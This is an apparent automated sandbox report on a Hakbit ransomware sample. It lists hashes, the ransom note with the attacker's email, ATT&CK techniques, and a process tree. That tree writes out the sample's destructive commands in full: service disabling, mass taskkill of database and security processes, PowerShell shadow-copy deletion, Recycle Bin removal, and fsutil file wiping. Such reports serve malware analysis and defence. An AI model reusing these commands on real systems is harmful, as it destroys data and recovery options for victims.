hakbit | 60b290310f67adb0ae186b4b938ca466a6b55653b2519261fa425127f5500a1f

max time kernel
135s
max time network
85s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
02/09/2024, 02:27 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Ransomware/Client-2.exe
Size

80KB
MD5

8152a3d0d76f7e968597f4f834fdfa9d
SHA1

c3cf05f3f79851d3c0d4266ab77c8e3e3f88c73e
SHA256

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b
SHA512

eb1a18cb03131466a4152fa2f6874b70c760317148684ca9b95044e50dc9cd19316d6e68e680ce18599114ba73e75264de5dab5afe611165b9c6c0b5f01002b4
SSDEEP

1536:SHbigeMiIeMfZ7tOBbFv0CIG0dDh/suIicRtpNf8SgRXt+AacRDVX8C4OntD4acN:SHbigeMiIeMfZ7tOBbFv0CIG0dDh/su0

Score

10^/10

hakbit credential_access discovery evasion execution ransomware spyware stealer

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

Family

hakbit

Ransom Note

To recover your data contact the email below potentialenergy@mail.ru Key Identifier: MFFcGkZss55TpauLXP8x7qUrMnueixXzrmlpNeWACBMypG2DHHh3NqccJ0Cn8Ow0C3GPPE2gkOmU+t1inqelagghVYiIFCt5Ao5qGtGXK0Bh7Un4GKQfojxpGRmb8XHTnK6CbqTzYu0gH7hjB6TAqwNY4HfcR7UHrBzk+TYIOLF5Z/1gwKYDJ75YtFlJJlM2AmlhnTd/7gEO10qtJb8mztXyEi5AY7XxbGpqBawJR3IUL3dGZ2JdAfB1kwbzzb/k/CgIeh5kLOYgMGHIHbpVlEMWURYKzlh61AFbsHsrZE0NSyDWmy1toq3amU6kGV3gZxZOROg1X4QqViChlJZqHizSx2pgHmtx2gNGYGpz5pxJg8RNifrK9eyXB0FSQSJ67KNIFiARdDhar/RelbGpzXp0+KsQAQhjkgcLfFrNnyb1ZFs8BljMFyrycSrCOvFZLdVdpACDc59LvOzLLvxmtGNEuZc0C4w4HTq6AjB0fDNBF0uKITQgyesR51Ghnw0n5OWFf+gbXFfFq4xS6OrWU9QH7HpTXATcavlvz+suVn2A09baXMqzK5iV69inmmJswOAiv1n4PL4OQN7xU6sf6AH9ZlLNsD7BcB85Q9q8nxjUeBUg1df5hzS/rQ0jeB6nTxbpvUxYR0ZEJOvWH9g2uLLpnxI2AJqP2vzFSAez4xM= Number of files that were processed is: 1230

Emails

potentialenergy@mail.ru

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Hakbit
Ransomware which encrypts files using AES, first seen in November 2019.
ransomware hakbit
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	Client-2.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4180	sc.exe
3772	sc.exe
3564	sc.exe
1372	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
7108	PING.EXE
7008	cmd.exe

Kills process with taskkill 47 IoCs

evasion

pid	Process
4068	taskkill.exe
1724	taskkill.exe
1996	taskkill.exe
4632	taskkill.exe
5068	taskkill.exe
1208	taskkill.exe
1912	taskkill.exe
1872	taskkill.exe
1396	taskkill.exe
4220	taskkill.exe
5072	taskkill.exe
1512	taskkill.exe
716	taskkill.exe
4952	taskkill.exe
2944	taskkill.exe
4720	taskkill.exe
596	taskkill.exe
96	taskkill.exe
312	taskkill.exe
1948	taskkill.exe
4780	taskkill.exe
1964	taskkill.exe
5032	taskkill.exe
4936	taskkill.exe
4316	taskkill.exe
1480	taskkill.exe
4796	taskkill.exe
4120	taskkill.exe
5092	taskkill.exe
4968	taskkill.exe
1120	taskkill.exe
4840	taskkill.exe
4992	taskkill.exe
3920	taskkill.exe
4128	taskkill.exe
3236	taskkill.exe
748	taskkill.exe
3900	taskkill.exe
1824	taskkill.exe
4520	taskkill.exe
308	taskkill.exe
3276	taskkill.exe
3524	taskkill.exe
4116	taskkill.exe
3572	taskkill.exe
3916	taskkill.exe
1400	taskkill.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
6992	notepad.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
7108	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe
3016	Client-2.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

description	pid	Process
Token: SeDebugPrivilege	3016	Client-2.exe
Token: SeDebugPrivilege	4520	taskkill.exe
Token: SeDebugPrivilege	3572	taskkill.exe
Token: SeDebugPrivilege	3276	taskkill.exe
Token: SeDebugPrivilege	1912	taskkill.exe
Token: SeDebugPrivilege	4220	taskkill.exe
Token: SeDebugPrivilege	3920	taskkill.exe
Token: SeDebugPrivilege	1120	taskkill.exe
Token: SeDebugPrivilege	1208	taskkill.exe
Token: SeDebugPrivilege	4780	taskkill.exe
Token: SeDebugPrivilege	1948	taskkill.exe
Token: SeDebugPrivilege	596	taskkill.exe
Token: SeDebugPrivilege	4120	taskkill.exe
Token: SeDebugPrivilege	4116	taskkill.exe
Token: SeDebugPrivilege	3900	taskkill.exe
Token: SeDebugPrivilege	5068	taskkill.exe
Token: SeDebugPrivilege	4936	taskkill.exe
Token: SeDebugPrivilege	4796	taskkill.exe
Token: SeDebugPrivilege	3916	taskkill.exe
Token: SeDebugPrivilege	1396	taskkill.exe
Token: SeDebugPrivilege	4992	taskkill.exe
Token: SeDebugPrivilege	2944	taskkill.exe
Token: SeDebugPrivilege	4128	taskkill.exe
Token: SeDebugPrivilege	96	taskkill.exe
Token: SeDebugPrivilege	1824	taskkill.exe
Token: SeDebugPrivilege	4632	taskkill.exe
Token: SeDebugPrivilege	5032	taskkill.exe
Token: SeDebugPrivilege	4840	taskkill.exe
Token: SeDebugPrivilege	1512	taskkill.exe
Token: SeDebugPrivilege	1480	taskkill.exe
Token: SeDebugPrivilege	312	taskkill.exe
Token: SeDebugPrivilege	4068	taskkill.exe
Token: SeDebugPrivilege	3236	taskkill.exe
Token: SeDebugPrivilege	308	taskkill.exe
Token: SeDebugPrivilege	716	taskkill.exe
Token: SeDebugPrivilege	1872	taskkill.exe
Token: SeDebugPrivilege	4968	taskkill.exe
Token: SeDebugPrivilege	1996	taskkill.exe
Token: SeDebugPrivilege	3524	taskkill.exe
Token: SeDebugPrivilege	4720	taskkill.exe
Token: SeDebugPrivilege	748	taskkill.exe
Token: SeDebugPrivilege	3420	powershell.exe
Token: SeDebugPrivilege	1400	taskkill.exe
Token: SeDebugPrivilege	1964	taskkill.exe
Token: SeDebugPrivilege	5072	taskkill.exe
Token: SeDebugPrivilege	4316	taskkill.exe
Token: SeDebugPrivilege	5092	taskkill.exe
Token: SeDebugPrivilege	4952	taskkill.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3016	Client-2.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
3016	Client-2.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3016 wrote to memory of 1372	3016	Client-2.exe	74
PID 3016 wrote to memory of 1372	3016	Client-2.exe	74
PID 3016 wrote to memory of 1920	3016	Client-2.exe	75
PID 3016 wrote to memory of 1920	3016	Client-2.exe	75
PID 3016 wrote to memory of 3564	3016	Client-2.exe	76
PID 3016 wrote to memory of 3564	3016	Client-2.exe	76
PID 3016 wrote to memory of 3772	3016	Client-2.exe	77
PID 3016 wrote to memory of 3772	3016	Client-2.exe	77
PID 3016 wrote to memory of 4180	3016	Client-2.exe	78
PID 3016 wrote to memory of 4180	3016	Client-2.exe	78
PID 3016 wrote to memory of 4220	3016	Client-2.exe	79
PID 3016 wrote to memory of 4220	3016	Client-2.exe	79
PID 3016 wrote to memory of 4796	3016	Client-2.exe	80
PID 3016 wrote to memory of 4796	3016	Client-2.exe	80
PID 3016 wrote to memory of 3524	3016	Client-2.exe	81
PID 3016 wrote to memory of 3524	3016	Client-2.exe	81
PID 3016 wrote to memory of 3276	3016	Client-2.exe	82
PID 3016 wrote to memory of 3276	3016	Client-2.exe	82
PID 3016 wrote to memory of 312	3016	Client-2.exe	83
PID 3016 wrote to memory of 312	3016	Client-2.exe	83
PID 3016 wrote to memory of 308	3016	Client-2.exe	84
PID 3016 wrote to memory of 308	3016	Client-2.exe	84
PID 3016 wrote to memory of 96	3016	Client-2.exe	85
PID 3016 wrote to memory of 96	3016	Client-2.exe	85
PID 3016 wrote to memory of 4520	3016	Client-2.exe	86
PID 3016 wrote to memory of 4520	3016	Client-2.exe	86
PID 3016 wrote to memory of 4128	3016	Client-2.exe	87
PID 3016 wrote to memory of 4128	3016	Client-2.exe	87
PID 3016 wrote to memory of 3920	3016	Client-2.exe	88
PID 3016 wrote to memory of 3920	3016	Client-2.exe	88
PID 3016 wrote to memory of 1396	3016	Client-2.exe	89
PID 3016 wrote to memory of 1396	3016	Client-2.exe	89
PID 3016 wrote to memory of 4632	3016	Client-2.exe	90
PID 3016 wrote to memory of 4632	3016	Client-2.exe	90
PID 3016 wrote to memory of 1400	3016	Client-2.exe	91
PID 3016 wrote to memory of 1400	3016	Client-2.exe	91
PID 3016 wrote to memory of 1120	3016	Client-2.exe	92
PID 3016 wrote to memory of 1120	3016	Client-2.exe	92
PID 3016 wrote to memory of 3916	3016	Client-2.exe	93
PID 3016 wrote to memory of 3916	3016	Client-2.exe	93
PID 3016 wrote to memory of 1964	3016	Client-2.exe	94
PID 3016 wrote to memory of 1964	3016	Client-2.exe	94
PID 3016 wrote to memory of 4968	3016	Client-2.exe	95
PID 3016 wrote to memory of 4968	3016	Client-2.exe	95
PID 3016 wrote to memory of 5068	3016	Client-2.exe	96
PID 3016 wrote to memory of 5068	3016	Client-2.exe	96
PID 3016 wrote to memory of 4992	3016	Client-2.exe	106
PID 3016 wrote to memory of 4992	3016	Client-2.exe	106
PID 3016 wrote to memory of 1996	3016	Client-2.exe	108
PID 3016 wrote to memory of 1996	3016	Client-2.exe	108
PID 3016 wrote to memory of 1724	3016	Client-2.exe	110
PID 3016 wrote to memory of 1724	3016	Client-2.exe	110
PID 3016 wrote to memory of 4780	3016	Client-2.exe	111
PID 3016 wrote to memory of 4780	3016	Client-2.exe	111
PID 3016 wrote to memory of 4068	3016	Client-2.exe	113
PID 3016 wrote to memory of 4068	3016	Client-2.exe	113
PID 3016 wrote to memory of 4840	3016	Client-2.exe	115
PID 3016 wrote to memory of 4840	3016	Client-2.exe	115
PID 3016 wrote to memory of 5072	3016	Client-2.exe	116
PID 3016 wrote to memory of 5072	3016	Client-2.exe	116
PID 3016 wrote to memory of 2944	3016	Client-2.exe	117
PID 3016 wrote to memory of 2944	3016	Client-2.exe	117
PID 3016 wrote to memory of 1824	3016	Client-2.exe	118
PID 3016 wrote to memory of 1824	3016	Client-2.exe	118

C:\Users\Admin\AppData\Local\Temp\Ransomware\Client-2.exe
"C:\Users\Admin\AppData\Local\Temp\Ransomware\Client-2.exe"
1⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3016
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  - Launches sc.exe
  PID:1372
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:1920
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  - Launches sc.exe
  PID:3564
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  - Launches sc.exe
  PID:3772
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  - Launches sc.exe
  PID:4180
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4220
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4796
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3524
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3276
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:312
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:308
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:96
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4520
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4128
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3920
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1396
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4632
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1400
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1120
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3916
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1964
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4968
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5068
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4992
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1996
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:1724
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4780
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4068
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4840
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5072
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2944
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1824
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1480
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1948
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3900
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:596
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3572
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4936
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5032
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3236
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:716
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4120
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1912
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1512
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1208
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4116
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5092
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:748
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4720
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4316
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1872
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4952
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3420
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:6992
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:7008
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:7108
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:6016
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Ransomware\Client-2.exe
  2⤵
  PID:7024
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:7160

Network

DNS

21.236.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

21.236.111.52.in-addr.arpa

IN PTR

Response

No results found

8.8.8.8:53

21.236.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

21.236.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Windows Credential Manager

T1555.004

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Network\Downloader\edbtmp.log

Filesize
1.3MB

MD5
2a6415dd2d3018147990087747d3bc6d

SHA1
c235ad2af8f2455ad687443a169e77db2f7841ab

SHA256
12ad448d87c9021b51a19abd7c578ed45e21efbf4f45e36e06f95d3fd4480753

SHA512
0b2fce7e144f277a6913be498535dfe3f3cc2f0066be929ee0fb35e88099edd16d1354c59f1955bf7b9d12e45ac51c9ba158a6a833a1a4eeb2e10c83efe7f476

Download Submit
C:\ProgramData\Microsoft\Provisioning\{c5dc3753-b6c8-4057-b396-bf13d769311c}\MasterDatastore.xml.energy[potentialenergy@mail.ru]

Filesize
4KB

MD5
a8135045089f0a617b8a68598015e313

SHA1
a6d75798ba689249354bc67d2e14b0e4021d8606

SHA256
ac9bb0e277bdaa1c8edc6b95af3248f596b57c9ffd09870ade94ead6b02d8dfe

SHA512
00659094fdc1b6a3dfac9217f5adef1d73bd5d9cd57088ae161c6c97e5ddfcd951ba6577cd3dd7f890f78bafe2b6e3ac45d49e261b265321e97706fd4f3e2546

Download Submit
C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\Prov\RunTime\162__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml.energy[potentialenergy@mail.ru]

Filesize
4KB

MD5
03b07e985bf72b448c02cb94bb29c53e

SHA1
135f884b830d384eaea573db946c15d709787aea

SHA256
6ff79671c2fd6f06332241d1881a1363985342e610948c206f45266ee1b28453

SHA512
e96c0a925ffff852d960192a0a493401b623111a7d303f757722c5b22b8458577efa31b378522ab8b7ed8bbcd969c52ebc25dd74950802673db65d7219a3d912

Download Submit
C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\Prov\RunTime\304__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml.energy[potentialenergy@mail.ru]

Filesize
480B

MD5
4c84772e7027f0c4e53aa403e1725aaf

SHA1
2aa1a1842afe491024eb53fa6b8c8ee2d11a8e93

SHA256
5e074b1238bd7e690f1eeb1e007145c76ca13d27f81c1ee83db99b7faa366ded

SHA512
9b39288f03bbce56f200bf1eaff6c612226e99eac73b82776272bf5015583f5280711746b26f7723f60aeae86be56640206844ba55f7f388e8c554fb02cdec22

Download Submit
C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\Prov\RunTime\619__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml.energy[potentialenergy@mail.ru]

Filesize
4KB

MD5
c29aa5f7897f6f285ad25553ad5715e4

SHA1
7c69d514399e8721e39109eb41dcf58b53fb026f

SHA256
b3c173390fcfbfe5c4a4771e5e6b89787605a0ec8a1753a5be5356fdf5d39dd9

SHA512
3839ed96ed758aeee45d521f8831a74c7c46f7318a31d23b038c52b24af7c877ed902bf94ffebe55187298d4031136fdbecc508cbd953e35d6747a722bb0a94a

Download Submit
C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\Prov\RunTime\81__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml.energy[potentialenergy@mail.ru]

Filesize
4KB

MD5
9bab832df5b9ba035a563fcb49eec2d0

SHA1
fd57e542fb47c7a0c56c37bcff71761e8efc61df

SHA256
663f8c470e7888b9ed004db3477fdfb65fc96a80e5f1ce95894780d2dbb10725

SHA512
88b13e8949f9290b710141bd950862d71056d8148ecd49e938d07db786037bec3da94406a481ee144f16b446152d758b542cd03d25602c652d600dbc311ca532

Download Submit
C:\ProgramData\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.energy[potentialenergy@mail.ru]

Filesize
180KB

MD5
7bb8f1dccdca683f8e50c280ccca610f

SHA1
ea711ca8fcb6405116d1fdb3dcafdebc102412c8

SHA256
35a8afaf9b77e9a273f4546e4a1fff2e9cd921cab2c40a03381b334a8f9ea2ed

SHA512
ea355b3e9a5f37d8cff95bfb28ff84e44c821997f6f680752b7ec6ed3a177f1f9218cbbd7b96123c5c45c1a4c986cab25e8a70d972a5b16b14fc9f8515cf01ec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
b49a31b6e3a6771dbfa29b309842ef4f

SHA1
